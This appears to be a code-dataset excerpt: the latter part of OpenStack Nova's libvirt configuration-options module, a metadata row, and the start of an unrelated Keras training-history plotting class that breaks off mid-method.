Enable a mouse cursor within a graphical VNC or SPICE sessions.
This will only be taken into account if the VM is fully virtualized and VNC
and/or SPICE is enabled. If the node doesn't support a graphical framebuffer,
then it is valid to set this to False.
Related options:
* ``[vnc]enabled``: If VNC is enabled, ``use_usb_tablet`` will have an effect.
* ``[spice]enabled`` + ``[spice].agent_enabled``: If SPICE is enabled and the
spice agent is disabled, the config value of ``use_usb_tablet`` will have
an effect.
"""),
cfg.StrOpt('live_migration_inbound_addr',
help="""
The IP address or hostname to be used as the target for live migration traffic.
If this option is set to None, the hostname of the migration target compute
node will be used.
This option is useful in environments where the live-migration traffic can
impact the network plane significantly. A separate network for live-migration
traffic can then use this config option and avoids the impact on the
management network.
Possible values:
* A valid IP address or hostname, else None.
"""),
# TODO(hieulq): change to URIOpt for validating schemas with next release
# of oslo_config.
cfg.StrOpt('live_migration_uri',
deprecated_for_removal=True,
deprecated_since="15.0.0",
deprecated_reason="""
live_migration_uri is deprecated for removal in favor of two other options that
allow to change live migration scheme and target URI: ``live_migration_scheme``
and ``live_migration_inbound_addr`` respectively.
""",
help="""
Live migration target URI to use.
Override the default libvirt live migration target URI (which is dependent
on virt_type). Any included "%s" is replaced with the migration target
hostname.
If this option is set to None (which is the default), Nova will automatically
generate the `live_migration_uri` value based on only 3 supported `virt_type`
in following list:
* 'kvm': 'qemu+tcp://%s/system'
* 'qemu': 'qemu+tcp://%s/system'
* 'xen': 'xenmigr://%s/system'
Related options:
* ``live_migration_inbound_addr``: If ``live_migration_inbound_addr`` value
is not None, the ip/hostname address of target compute node is used instead
of ``live_migration_uri`` as the uri for live migration.
* ``live_migration_scheme``: If ``live_migration_uri`` is not set, the scheme
used for live migration is taken from ``live_migration_scheme`` instead.
"""),
cfg.StrOpt('live_migration_scheme',
help="""
Schema used for live migration.
Override the default libvirt live migration scheme (which is dependant on
virt_type). If this option is set to None, nova will automatically choose a
sensible default based on the hypervisor. It is not recommended that you change
this unless you are very sure that hypervisor supports a particular scheme.
Related options:
* ``virt_type``: This option is meaningful only when ``virt_type`` is set to
`kvm` or `qemu`.
* ``live_migration_uri``: If ``live_migration_uri`` value is not None, the
scheme used for live migration is taken from ``live_migration_uri`` instead.
"""),
cfg.BoolOpt('live_migration_tunnelled',
default=False,
help="""
Enable tunnelled migration.
This option enables the tunnelled migration feature, where migration data is
transported over the libvirtd connection. If enabled, we use the
VIR_MIGRATE_TUNNELLED migration flag, avoiding the need to configure
the network to allow direct hypervisor to hypervisor communication.
If False, use the native transport. If not set, Nova will choose a
sensible default based on, for example the availability of native
encryption support in the hypervisor. Enable this option will definitely
impact performance massively.
Note that this option is NOT compatible with use of block migration.
Possible values:
* Supersedes and (if set) overrides the deprecated 'live_migration_flag' and
'block_migration_flag' to enable tunneled migration.
"""),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help="""
Maximum bandwidth(in MiB/s) to be used during migration.
If set to 0, the hypervisor will choose a suitable default. Some hypervisors
do not support this feature and will return an error if bandwidth is not 0.
Please refer to the libvirt documentation for further details.
"""),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_MIN constant.
cfg.IntOpt('live_migration_downtime',
default=500,
help="""
Maximum permitted downtime, in milliseconds, for live migration
switchover.
Will be rounded up to a minimum of %dms. You can increase this value
if you want to allow live-migrations to complete faster, or avoid
live-migration timeout errors by allowing the guest to be paused for
longer during the live-migration switch over.
Related options:
* live_migration_completion_timeout
""" % LIVE_MIGRATION_DOWNTIME_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant.
cfg.IntOpt('live_migration_downtime_steps',
default=10,
help="""
Number of incremental steps to reach max downtime value.
Will be rounded up to a minimum of %d steps.
""" % LIVE_MIGRATION_DOWNTIME_STEPS_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant.
cfg.IntOpt('live_migration_downtime_delay',
default=75,
help="""
Time to wait, in seconds, between each step increase of the migration
downtime.
Minimum delay is %d seconds. Value is per GiB of guest RAM + disk to be
transferred, with lower bound of a minimum of 2 GiB per device.
""" % LIVE_MIGRATION_DOWNTIME_DELAY_MIN),
cfg.IntOpt('live_migration_completion_timeout',
default=800,
mutable=True,
help="""
Time to wait, in seconds, for migration to successfully complete transferring
data before aborting the operation.
Value is per GiB of guest RAM + disk to be transferred, with lower bound of
a minimum of 2 GiB. Should usually be larger than downtime delay * downtime
steps. Set to 0 to disable timeouts.
Related options:
* live_migration_downtime
* live_migration_downtime_steps
* live_migration_downtime_delay
"""),
cfg.IntOpt('live_migration_progress_timeout',
default=0,
deprecated_for_removal=True,
deprecated_reason="Serious bugs found in this feature.",
mutable=True,
help="""
Time to wait, in seconds, for migration to make forward progress in
transferring data before aborting the operation.
Set to 0 to disable timeouts.
This is deprecated, and now disabled by default because we have found serious
bugs in this feature that caused false live-migration timeout failures. This
feature will be removed or replaced in a future release.
"""),
cfg.BoolOpt('live_migration_permit_post_copy',
default=False,
help="""
This option allows nova to switch an on-going live migration to post-copy
mode, i.e., switch the active VM to the one on the destination node before the
migration is complete, therefore ensuring an upper bound on the memory that
needs to be transferred. Post-copy requires libvirt>=1.3.3 and QEMU>=2.5.0.
When permitted, post-copy mode will be automatically activated if a
live-migration memory copy iteration does not make percentage increase of at
least 10% over the last iteration.
The live-migration force complete API also uses post-copy when permitted. If
post-copy mode is not available, force complete falls back to pausing the VM
to ensure the live-migration operation will complete.
When using post-copy mode, if the source and destination hosts loose network
connectivity, the VM being live-migrated will need to be rebooted. For more
details, please see the Administration guide.
Related options:
* live_migration_permit_auto_converge
"""),
cfg.BoolOpt('live_migration_permit_auto_converge',
default=False,
help="""
This option allows nova to start live migration with auto converge on.
Auto converge throttles down CPU if a progress of on-going live migration
is slow. Auto converge will only be used if this flag is set to True and
post copy is not permitted or post copy is unavailable due to the version
of libvirt and QEMU in use. Auto converge requires libvirt>=1.2.3 and
QEMU>=1.6.0.
Related options:
* live_migration_permit_post_copy
"""),
cfg.StrOpt('snapshot_image_format',
choices=('raw', 'qcow2', 'vmdk', 'vdi'),
help="""
Determine the snapshot image format when sending to the image service.
If set, this decides what format is used when sending the snapshot to the
image service.
If not set, defaults to same type as source image.
Possible values:
* ``raw``: RAW disk format
* ``qcow2``: KVM default disk format
* ``vmdk``: VMWare default disk format
* ``vdi``: VirtualBox default disk format
* If not set, defaults to same type as source image.
"""),
cfg.StrOpt('disk_prefix',
help="""
Override the default disk prefix for the devices attached to an instance.
If set, this is used to identify a free disk device name for a bus.
Possible values:
* Any prefix which will result in a valid disk device name like 'sda' or 'hda'
for example. This is only necessary if the device names differ to the
commonly known device name prefixes for a virtualization type such as: sd,
xvd, uvd, vd.
Related options:
* ``virt_type``: Influences which device type is used, which determines
the default disk prefix.
"""),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
choices=('host-model', 'host-passthrough', 'custom', 'none'),
help="""
Is used to set the CPU mode an instance should have.
If virt_type="kvm|qemu", it will default to "host-model", otherwise it will
default to "none".
Possible values:
* ``host-model``: Clones the host CPU feature flags.
* ``host-passthrough``: Use the host CPU model exactly;
* ``custom``: Use a named CPU model;
* ``none``: Not set any CPU model.
Related options:
* ``cpu_model``: If ``custom`` is used for ``cpu_mode``, set this config
option too, otherwise this would result in an error and the instance won't
be launched.
"""),
cfg.StrOpt('cpu_model',
help="""
Set the name of the libvirt CPU model the instance should use.
Possible values:
* The names listed in /usr/share/libvirt/cpu_map.xml
Related options:
* ``cpu_mode``: Don't set this when ``cpu_mode`` is NOT set to ``custom``.
This would result in an error and the instance won't be launched.
* ``virt_type``: Only the virtualization types ``kvm`` and ``qemu`` use this.
"""),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
choices=('none', 'os', 'hardware', 'auto'),
help='The data source used to the populate the host "serial" '
'UUID exposed to guest in the virtual BIOS.'),
cfg.IntOpt('mem_stats_period_seconds',
default=10,
help='A number of seconds to memory usage statistics period. '
'Zero or negative value mean to disable memory usage '
'statistics.'),
cfg.ListOpt('uid_maps',
default=[],
help='List of uid targets and ranges.'
'Syntax is guest-uid:host-uid:count'
'Maximum of 5 allowed.'),
cfg.ListOpt('gid_maps',
default=[],
help='List of guid targets and ranges.'
'Syntax is guest-gid:host-gid:count'
'Maximum of 5 allowed.'),
cfg.IntOpt('realtime_scheduler_priority',
default=1,
help='In a realtime host context vCPUs for guest will run in '
'that scheduling priority. Priority depends on the host '
'kernel (usually 1-99)'),
cfg.ListOpt('enabled_perf_events',
default=[],
help= """
This is a performance event list which could be used as monitor. These events
will be passed to libvirt domain xml while creating a new instances.
Then event statistics data can be collected from libvirt. The minimum
libvirt version is 2.0.0. For more information about `Performance monitoring
events`, refer https://libvirt.org/formatdomain.html#elementsPerf .
Possible values:
* A string list. For example: ``enabled_perf_events = cmt, mbml, mbmt``
The supported events list can be found in
https://libvirt.org/html/libvirt-libvirt-domain.html ,
which you may need to search key words ``VIR_PERF_PARAM_*``
"""),
]
libvirt_imagebackend_opts = [
cfg.StrOpt('images_type',
default='default',
choices=('raw', 'flat', 'qcow2', 'lvm', 'rbd', 'ploop',
'default'),
help="""
VM Images format.
If default is specified, then use_cow_images flag is used instead of this
one.
Related options:
* virt.use_cow_images
* images_volume_group
"""),
cfg.StrOpt('images_volume_group',
help="""
LVM Volume Group that is used for VM images, when you specify images_type=lvm
Related options:
* images_type
"""),
cfg.BoolOpt('sparse_logical_volumes',
default=False,
help="""
Create sparse logical volumes (with virtualsize) if this flag is set to True.
"""),
cfg.StrOpt('images_rbd_pool',
default='rbd',
help='The RADOS pool in which rbd volumes are stored'),
cfg.StrOpt('images_rbd_ceph_conf',
default='', # default determined by librados
help='Path to the ceph configuration file to use'),
cfg.StrOpt('hw_disk_discard',
choices=('ignore', 'unmap'),
help="""
Discard option for nova managed disks.
Requires:
* Libvirt >= 1.0.6
* Qemu >= 1.5 (raw format)
* Qemu >= 1.6 (qcow2 format)
"""),
]
libvirt_imagecache_opts = [
cfg.StrOpt('image_info_filename_pattern',
default='$instances_path/$image_cache_subdirectory_name/'
'%(image)s.info',
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='Image info files are no longer used by the '
'image cache',
help='Allows image information files to be stored in '
'non-standard locations'),
cfg.IntOpt('remove_unused_resized_minimum_age_seconds',
default=3600,
help='Unused resized base images younger than this will not be '
'removed'),
cfg.BoolOpt('checksum_base_images',
default=False,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='Write a checksum for files in _base to disk'),
cfg.IntOpt('checksum_interval_seconds',
default=3600,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='How frequently to checksum base images'),
]
libvirt_lvm_opts = [
cfg.StrOpt('volume_clear',
default='zero',
choices=('none', 'zero', 'shred'),
help="""
Method used to wipe ephemeral disks when they are deleted. Only takes effect
if LVM is set as backing storage.
Possible values:
* none - do not wipe deleted volumes
* zero - overwrite volumes with zeroes
* shred - overwrite volume repeatedly
Related options:
* images_type - must be set to ``lvm``
* volume_clear_size
"""),
cfg.IntOpt('volume_clear_size',
default=0,
min=0,
help="""
Size of area in MiB, counting from the beginning of the allocated volume,
that will be cleared using method set in ``volume_clear`` option.
Possible values:
* 0 - clear whole volume
* >0 - clear specified amount of MiB
Related options:
* images_type - must be set to ``lvm``
* volume_clear - must be set and the value must be different than ``none``
for this option to have any impact
"""),
]
libvirt_utils_opts = [
cfg.BoolOpt('snapshot_compression',
default=False,
help="""
Enable snapshot compression for ``qcow2`` images.
Note: you can set ``snapshot_image_format`` to ``qcow2`` to force all
snapshots to be in ``qcow2`` format, independently from their original image
type.
Related options:
* snapshot_image_format
"""),
]
libvirt_vif_opts = [
cfg.BoolOpt('use_virtio_for_bridges',
default=True,
help='Use virtio for bridge interfaces with KVM/QEMU'),
]
libvirt_volume_opts = [
cfg.ListOpt('qemu_allowed_storage_drivers',
default=[],
help="""
Protocols listed here will be accessed directly from QEMU.
If gluster is present in qemu_allowed_storage_drivers, glusterfs's backend will
pass a disk configuration to QEMU. This allows QEMU to access the volume using
libgfapi rather than mounting GlusterFS via fuse.
Possible values:
* [gluster]
"""),
cfg.BoolOpt('volume_use_multipath',
default=False,
deprecated_name='iscsi_use_multipath',
help="""
Use multipath connection of the iSCSI or FC volume
Volumes can be connected in the LibVirt as multipath devices. This will
provide high availability and fault tolerance.
""")
]
libvirt_volume_aoe_opts = [
cfg.IntOpt('num_aoe_discover_tries',
default=3,
help="""
Number of times to rediscover AoE target to find volume.
Nova provides support for block storage attaching to hosts via AOE (ATA over
Ethernet). This option allows the user to specify the maximum number of retry
attempts that can be made to discover the AoE device.
""")
]
libvirt_volume_glusterfs_opts = [
cfg.StrOpt('glusterfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Absolute path to the directory where the glusterfs volume is mounted on the
compute node.
""")
]
# TODO(sneti): This config option is also used for other protocols like
# fibrechannel, scaleio, disco. So this should be renamed to
# num_volume_scan_tries
libvirt_volume_iscsi_opts = [
cfg.IntOpt('num_iscsi_scan_tries',
default=5,
help="""
Number of times to scan iSCSI target to find volume.
"""),
cfg.StrOpt('iscsi_iface',
deprecated_name='iscsi_transport',
help="""
The iSCSI transport iface to use to connect to target in case offload support
is desired.
Default format is of the form <transport_name>.<hwaddress> where
<transport_name> is one of (be2iscsi, bnx2i, cxgb3i, cxgb4i, qla4xxx, ocs) and
<hwaddress> is the MAC address of the interface and can be generated via the
iscsiadm -m iface command. Do not confuse the iscsi_iface parameter to be
provided here with the actual transport name.
""")
# iser is also supported, but use LibvirtISERVolumeDriver
# instead
]
libvirt_volume_iser_opts = [
cfg.IntOpt('num_iser_scan_tries',
default=5,
help="""
Number of times to scan iSER target to find volume.
iSER is a server network protocol that extends iSCSI protocol to use Remote
Direct Memory Access (RDMA). This option allows the user to specify the maximum
number of scan attempts that can be made to find iSER volume.
"""),
cfg.BoolOpt('iser_use_multipath',
default=False,
help="""
Use multipath connection of the iSER volume.
iSER volumes can be connected as multipath devices. This will provide high
availability and fault tolerance.
""")
]
libvirt_volume_net_opts = [
cfg.StrOpt('rbd_user',
help="""
The RADOS client name for accessing rbd(RADOS Block Devices) volumes.
Libvirt will refer to this user when connecting and authenticating with
the Ceph RBD server.
"""),
cfg.StrOpt('rbd_secret_uuid',
help="""
The libvirt UUID of the secret for the rbd_user volumes.
"""),
]
libvirt_volume_nfs_opts = [
cfg.StrOpt('nfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the NFS volume is mounted on the compute node.
The default is 'mnt' directory of the location where nova's Python module
is installed.
NFS provides shared storage for the OpenStack Block Storage service.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('nfs_mount_options',
help="""
Mount options passed to the NFS client. See section of the nfs man page
for details.
Mount options controls the way the filesystem is mounted and how the
NFS client behaves when accessing files on this mount point.
Possible values:
* Any string representing mount options separated by commas.
* Example string: vers=3,lookupcache=pos
"""),
]
libvirt_volume_quobyte_opts = [
cfg.StrOpt('quobyte_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Quobyte volume is mounted on the compute node.
Nova supports Quobyte volume driver that enables storing Block Storage
service volumes on a Quobyte storage back end. This Option sepcifies the
path of the directory where Quobyte volume is mounted.
Possible values:
* A string representing absolute path of mount point.
"""),
cfg.StrOpt('quobyte_client_cfg',
help='Path to a Quobyte Client configuration file.'),
]
libvirt_volume_scality_opts = [
cfg.StrOpt('scality_sofs_config',
help="""
Path or URL to Scality SOFS(Scale-Out File Server) configuration file.
The Scality SOFS provides OpenStack users the option of storing their
data on a high capacity, replicated, highly available Scality Ring object
storage cluster.
"""),
cfg.StrOpt('scality_sofs_mount_point',
default='$state_path/scality',
help="""
Base dir where Scality SOFS shall be mounted.
The Scality volume driver in Nova mounts SOFS and lets the hypervisor access
the volumes.
Possible values:
* $state_path/scality where state_path is a config option that specifies
the top-level directory for maintaining nova's state or Any string
containing the full directory path.
"""),
]
libvirt_volume_smbfs_opts = [
cfg.StrOpt('smbfs_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the SMBFS shares are mounted on the compute node.
"""),
cfg.StrOpt('smbfs_mount_options',
default='',
help="""
Mount options passed to the SMBFS client.
Provide SMBFS options as a single string containing all parameters.
See mount.cifs man page for details. Note that the libvirt-qemu ``uid``
and ``gid`` must be specified.
"""),
]
libvirt_remotefs_opts = [
cfg.StrOpt('remote_filesystem_transport',
default='ssh',
choices=('ssh', 'rsync'),
help="""
libvirt's transport method for remote file operations.
Because libvirt cannot use RPC to copy files over network to/from other
compute nodes, other method must be used for:
* creating directory on remote host
* creating file on remote host
* removing file from remote host
* copying file to remote host
""")
]
libvirt_volume_vzstorage_opts = [
cfg.StrOpt('vzstorage_mount_point_base',
default=paths.state_path_def('mnt'),
help="""
Directory where the Virtuozzo Storage clusters are mounted on the compute
node.
This option defines non-standard mountpoint for Vzstorage cluster.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_user',
default='stack',
help="""
Mount owner user name.
This option defines the owner user of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_group',
default='qemu',
help="""
Mount owner group name.
This option defines the owner group of Vzstorage cluster mountpoint.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_mount_perms',
default='0770',
help="""
Mount access mode.
This option defines the access bits of Vzstorage cluster mountpoint,
in the format similar to one of chmod(1) utility, like this: 0770.
It consists of one to four digits ranging from 0 to 7, with missing
lead digits assumed to be 0's.
Related options:
* vzstorage_mount_* group of parameters
"""
),
cfg.StrOpt('vzstorage_log_path',
default='/var/log/pstorage/%(cluster_name)s/nova.log.gz',
help="""
Path to vzstorage client log.
This option defines the log of cluster operations,
it should include "%(cluster_name)s" template to separate
logs from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed logging options.
"""
),
cfg.StrOpt('vzstorage_cache_path',
default=None,
help="""
Path to the SSD cache file.
You can attach an SSD drive to a client and configure the drive to store
a local cache of frequently accessed data. By having a local cache on a
client's SSD drive, you can increase the overall cluster performance by
up to 10 and more times.
WARNING! There is a lot of SSD models which are not server grade and
may loose arbitrary set of data changes on power loss.
Such SSDs should not be used in Vstorage and are dangerous as may lead
to data corruptions and inconsistencies. Please consult with the manual
on which SSD models are known to be safe or verify it using
vstorage-hwflush-check(1) utility.
This option defines the path which should include "%(cluster_name)s"
template to separate caches from multiple shares.
Related options:
* vzstorage_mount_opts may include more detailed cache options.
"""
),
cfg.ListOpt('vzstorage_mount_opts',
default=[],
help="""
Extra mount options for pstorage-mount
For full description of them, see
https://static.openvz.org/vz-man/man1/pstorage-mount.1.gz.html
Format is a python string representation of arguments list, like:
"[\'-v\', \'-R\', \'500\']"
Shouldn\'t include -c, -l, -C, -u, -g and -m as those have
explicit vzstorage_* options.
Related options:
* All other vzstorage_* options
"""
),
]
ALL_OPTS = list(itertools.chain(
libvirt_general_opts,
libvirt_imagebackend_opts,
libvirt_imagecache_opts,
libvirt_lvm_opts,
libvirt_utils_opts,
libvirt_vif_opts,
libvirt_volume_opts,
libvirt_volume_aoe_opts,
libvirt_volume_glusterfs_opts,
libvirt_volume_iscsi_opts,
libvirt_volume_iser_opts,
libvirt_volume_net_opts,
libvirt_volume_nfs_opts,
libvirt_volume_quobyte_opts,
libvirt_volume_scality_opts,
libvirt_volume_smbfs_opts,
libvirt_remotefs_opts,
libvirt_volume_vzstorage_opts,
))
def register_opts(conf):
conf.register_group(libvirt_group)
conf.register_opts(ALL_OPTS, group=libvirt_group)
def list_opts():
return {libvirt_group: ALL_OPTS}
| nova/conf/libvirt.py | 38,216 | needs:fix_opt_description needs:check_deprecation_status needs:check_opt_group_and_type needs:fix_opt_description_indentation needs:fix_opt_registration_consistency Copyright 2016 OpenStack Foundation All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Downtime period in milliseconds Step count Delay in seconds TODO(hieulq): change to URIOpt for validating schemas with next release of oslo_config. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_MIN constant. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant. TODO(hieulq): Need to add min argument by moving from LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant. default determined by librados TODO(sneti): This config option is also used for other protocols like fibrechannel, scaleio, disco. So this should be renamed to num_volume_scan_tries iser is also supported, but use LibvirtISERVolumeDriver instead | 1,453 | en | 0.77009 |
import re
import matplotlib.pyplot as plt
from DatasetHandler.ContentSupport import isNotNone, isNone
from Plotter.SavePlots import PlotSaver
class HistoryPlotter(object):
"""
This class provides a History plotting pipeline using mathplot.
"""
_using_history:bool = False # This for a later implemented part of the tool
_path:str = None
_history = None
_history_keys:dict = None
_history_keys_list:list = None
_losses:list = None
_val_losses:list = None
_acc_stdcc_list:list = None
_val_acc_stdcc_list:list = None
_acc_topkcc_list:list = None
_val_acc_topkcc_list:list = None
_learning_rates:list = None
_epochs:int = 0
def __init__(self, model_description:str, path:str = None, history = None, save_it:bool = True, new_style:bool = False):
"""
The class constructor.
Attention: File history plotting is not yet implemented!
:param model_description:str: something to name the image unique and is also the file name
:param path:str: path of a file containing a history
:param history: a history
:param save_it:bool: save the plot instead of showing
:param new_style:bool: desired matplot lib standard or new style
"""
try:
self._model_description = model_description if isNotNone(model_description) else 'undescribed_model'
if isNotNone(path) and isNone(history):
self._path:str = path
self._using_history = False
if isNotNone(history):
self._history = history
self._history_keys = history.history.keys()
self._history_keys_list = list(self._history_keys)
self._using_history = True
self._new_style:bool = new_style
self._save_it:bool = save_it
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.Constructor]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def PlotHistory(self):
"""
Thise method allow to plot a history from directly a keras history.
Plotting from log is not yet implemented!
"""
try:
if self._using_history:
if self._new_style:
self.CollectFromHistory()
self.DirectPlotHistory()
else:
self.OldPlotHistory()
#TODO: Log file history plotting is not yet implemented
#else:
# self.PlotHistoryFromLog()
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.PlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectAccFromHistory(self, name:str):
"""
This method collect the accuracy data from the history into 2 lists.
:param name:str: name of the used acc metric
"""
try:
acc_list:list = []
val_acc_list:list = []
name = re.sub('val_', '', name)
if name in self._history_keys:
acc_list = [s for s in self._history_keys if (name == s)]
val_acc_list = [s for s in self._history_keys if ('val_'+name == s)]
if isNotNone(acc_list) and isNotNone(val_acc_list):
self._history_keys_list.remove(name)
self._history_keys_list.remove('val_'+name)
print("Found accuracy metrics in history!")
return acc_list, val_acc_list
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectAccFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLossFromHistory(self):
"""
This method collect the loss metric data from the history.
"""
try:
loss_val:str = 'loss'
if loss_val in self._history_keys:
self._losses = [s for s in self._history_keys if (loss_val == s)]
self._val_losses = [s for s in self._history_keys if ('val'+loss_val in s)]
self._epochs = len(self._history.epoch)
if len(self._losses) == 0 or len(self._val_losses) == 0:
print('Loss is missing in history')
return
if isNotNone(self._losses) and isNotNone(self._val_losses):
self._history_keys_list.remove(loss_val)
self._history_keys_list.remove('val_'+loss_val)
print("Found losses in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLossFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectLearningRatesFromHistory(self):
"""
This method collect the learning rate metric data from the history.
"""
try:
lr_val:str = 'lr'
if lr_val in self._history_keys:
self._learning_rates = [s for s in self._history_keys if (lr_val == s)]
if isNotNone(self._learning_rates):
self._history_keys_list.remove(lr_val)
print("Found learning rates in history!")
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectLearningRatesFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def CollectFromHistory(self):
"""
This method collect all necessary train informations from the history.
"""
if self._using_history:
try:
print("Collect losses from history...")
self.CollectLossFromHistory()
print("Collect learning rate from history...")
self.CollectLearningRatesFromHistory()
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_stdcc_list, self._val_acc_stdcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
print("Collect ", self._history_keys_list[0], " from history...")
self._acc_topkcc_list, self._val_acc_topkcc_list = self.CollectAccFromHistory(name=self._history_keys_list[0])
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.CollectFromHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
else:
print('No history initialized!')
def DirectPlotHistory(self):
"""
This method helps to plot a keras history containing losses, accuracy and possibly least learning rates.
"""
try:
fig_num:int = 1
## Loss
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot',
train_val_lists = [self._losses, self._val_losses])
fig_num += 1
## Top k Categorical Crossentropy
if ('top_k_categorical_accuracy' in self._history_keys) and isNotNone(self._acc_topkcc_list) and isNotNone(self._val_acc_topkcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot',
train_val_lists = [self._acc_topkcc_list, self._val_acc_topkcc_list])
fig_num += 1
## Categorical Crossentropy
if 'categorical_accuracy' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
## General
if 'acc' in self._history_keys and isNotNone(self._acc_stdcc_list) and isNotNone(self._val_acc_stdcc_list):
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot',
train_val_lists = [self._acc_stdcc_list, self._val_acc_stdcc_list])
fig_num += 1
if 'lr' in self._history_keys and isNotNone(self._learning_rates):
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
template = "An exception of type {0} occurred in [HistoryPlotter.DirectPlotHistory]. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
def OldPlotHistory(self):
"""
This method plot the history in the old way.
"""
try:
fig_num:int = 1
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model loss',
metric = 'loss',
axis_labels = ['train', 'validation'],
history_labels = ['Loss', 'Epoch'],
extender = 'loss_epoch_plot')
fig_num += 1
if 'acc' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Accuracy',
metric = 'acc',
axis_labels = ['train', 'validation'],
history_labels = ['Accuracy', 'Epoch'],
extender = 'accuracy_epoch_plot')
fig_num += 1
if 'top_k_categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Top k Categorical Accuracy',
metric = 'top_k_categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Top k Categorical Accuracy', 'Epoch'],
extender = 'top_k_categoriacal_epoch_plot')
fig_num += 1
if 'categorical_accuracy' in self._history_keys:
self.AccOrLossPlot( fig_num = fig_num,
title = 'Model Categorical Accuracy',
metric = 'categorical_accuracy',
axis_labels = ['train', 'validation'],
history_labels = ['Categorical Accuracy', 'Epoch'],
extender = 'categoriacal_epoch_plot')
fig_num += 1
if 'lr' in self._history_keys:
self.LearningPlot( fig_num = fig_num,
title = 'Model Learning Rate')
fig_num += 1
except Exception as ex:
